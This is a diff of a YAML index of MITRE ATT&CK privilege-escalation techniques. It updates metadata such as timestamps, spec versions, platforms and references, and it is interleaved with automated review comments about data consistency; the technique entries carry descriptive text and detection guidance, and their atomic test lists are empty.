@@ -21183,7 +21491,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21192,19 +21500,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -21252,11 +21558,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21324,23 +21631,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
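Review bot: two things in this hunk deserve a line in the commit message. The Leitch Hollowing reference now points at `new.dc414.org`, a third-party mirror, rather than the original `autosectools.com` publisher; that is fine if the original is gone, but note it so a future link check does not swap it back. And `modified` for T1068 goes backwards from 2023-10-31 to 2023-04-07, the same kind of regression seen on T1574.013, so the T1068 object also appears to come from an older release than the rest of the patch.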
@@ -21403,11 +21709,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
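Review bot: T1068 keeps `x_mitre_attack_spec_version: 3.1.0` while the surrounding techniques are bumped to 3.2.0, which matches its older `modified` timestamp in the previous hunk. If the intent is a single coherent ATT&CK release, T1068 (and T1574.013) should be re-pulled from the same source as the others rather than merged as-is.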
@@ -21460,8 +21765,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21509,78 +21814,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
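Review bot: the 67 removed lines here are a key reordering, not a content change; `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `created*` and the whole `external_references` list are re-emitted in later hunks of the same block, and the only real edits in T1546.004 are the `modified` timestamp and reference retrieved dates. Emitting keys in a stable order from the generator (or sorting them before serialising) would make diffs like this reviewable; as it stands a reviewer has to diff the removed and re-added reference entries by hand to see that nothing was silently changed.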
@@ -21628,6 +21866,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21638,9 +21880,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -21649,8 +21895,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
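Review bot: `spec_version: '2.1'` is dropped from this object, and the same deletion recurs for every object below, while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0 and `revoked: false` is added. If anything downstream validates these objects as STIX 2.1, where `spec_version` is a required common property, it will now fail; either confirm the consumer ignores it or have the generator carry it through. The `x_mitre_modified_by_ref` removed in the previous hunk is restored at the end of the object, so no key is lost there. Of the re-added references, the `bencane blog bashrc` entry (retrieved September 25, 2024) is new relative to the deletions visible above and matches the updated `modified` stamp; the rest are moved entries.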
@@ -21696,7 +22001,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
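Review bot: `modified` moves backward here, from 2022-04-25T14:00:00.188Z to 2021-02-09T15:49:58.414Z. The old values across this file share round clock times (14:00:00.188Z, 14:49:39.188Z) that look like bulk release stamps, and the new ones are earlier per-object edit times; the same regression appears below for T1548.004, T1547.002, T1546.015, T1574.009, T1037.005, T1037.003, T1546.010, T1543.001, T1055.009, T1134, T1055.005, T1547.007, T1574.002, T1055.008 and T1037.001. That is consistent with regenerating from a bundle that preserves original timestamps rather than from an older dataset, but confirm the source version, because a tool that treats `modified` as a monotonic newer-wins key would discard these updates.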
@@ -21721,13 +22026,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
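Review bot: for T1134.005 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted with no replacement in view, whereas the object above paired the deletion with a new `x_mitre_attack_spec_version: 3.2.0`. The same unpaired deletion recurs for T1037.003, T1055.009, T1055.005, T1055.008 and T1037.001. If the key now sits earlier in those objects, outside the hunk context, this is fine; otherwise these objects lose their spec-version marker and any consumer that branches on it falls through to a default.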
@@ -21807,7 +22110,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21843,7 +22145,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21866,12 +22168,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -21949,12 +22250,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22015,7 +22315,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -22059,7 +22358,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -22081,7 +22380,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -22162,7 +22460,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -22185,7 +22482,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -22215,12 +22512,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22305,7 +22600,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22370,7 +22664,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22445,7 +22738,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22473,7 +22766,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22504,7 +22796,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22547,12 +22839,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22569,7 +22859,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -22628,7 +22918,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22710,12 +22999,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22812,7 +23100,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -22926,7 +23213,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -22996,7 +23282,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -23024,7 +23309,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23068,8 +23353,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -23105,7 +23388,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23124,12 +23407,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23179,12 +23461,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23217,9 +23498,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -23236,9 +23518,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
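Review bot: `x_mitre_platforms` for T1098.002 loses `Office 365` and `Google Workspace` and gains `Office Suite`, with the technique version going 2.1 to 2.2. If the per-platform index files in this repository are produced by filtering on `x_mitre_platforms`, this technique disappears from any Office 365 or Google Workspace index unless the generator maps the consolidated `Office Suite` value back onto those platforms; check that mapping before merging.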
@@ -23284,38 +23565,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
